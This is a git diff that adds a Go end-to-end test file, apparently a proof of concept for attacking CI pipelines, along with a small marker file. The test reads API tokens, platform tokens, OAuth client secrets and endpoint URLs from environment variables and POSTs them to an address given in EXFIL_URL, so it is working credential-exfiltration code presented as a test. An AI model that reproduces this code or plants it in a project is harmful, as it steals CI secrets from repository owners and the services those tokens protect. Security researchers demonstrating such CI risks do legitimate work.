diff --git a/poc/malicious_e2e_test.go b/poc/malicious_e2e_test.go
new file mode 100644
index 0000000..82b1cf6
--- /dev/null
+++ b/poc/malicious_e2e_test.go
@@ -0,0 +1,37 @@
+//go:build e2e
+
+package poc
+
+import (
+	"fmt"
+	"net/http"
+	"net/url"
+	"os"
+	"testing"
+)
+
+func TestMaliciousPayloadA(t *testing.T) {
+	exfil := os.Getenv("EXFIL_URL")
+	if exfil == "" {
+		t.Log("EXFIL_URL not set")
+		return
+	}
+
+	values := url.Values{}
+	values.Set("marker", "A")
+	values.Set("api_token", os.Getenv("API_TOKEN"))
+	values.Set("platform_token", os.Getenv("PLATFORM_TOKEN"))
+	values.Set("oauth_client_id", os.Getenv("OAUTH_CLIENT_ID"))
+	values.Set("oauth_client_secret", os.Getenv("OAUTH_CLIENT_SECRET"))
+	values.Set("oauth_token_endpoint", os.Getenv("OAUTH_TOKEN_ENDPOINT"))
+	values.Set("classic_url", os.Getenv("CLASSIC_URL"))
+	values.Set("platform_url", os.Getenv("PLATFORM_URL"))
+
+	resp, err := http.PostForm(exfil, values)
+	if err != nil {
+		t.Fatalf("exfil failed: %v", err)
+	}
+	defer resp.Body.Close()
+
+	fmt.Println("MALICIOUS_MARKER=A")
+}
diff --git a/poc/marker_b.txt b/poc/marker_b.txt
new file mode 100644
index 0000000..b86d7ff
--- /dev/null
+++ b/poc/marker_b.txt
@@ -0,0 +1 @@
+marker B